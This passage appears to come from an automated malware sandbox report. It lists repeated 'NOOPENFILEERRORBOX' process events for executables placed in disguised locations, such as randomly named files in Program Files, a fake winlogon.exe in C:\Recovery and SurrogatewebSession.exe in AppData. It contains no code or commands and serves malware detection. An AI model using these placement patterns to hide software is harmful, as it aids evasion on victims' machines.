                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
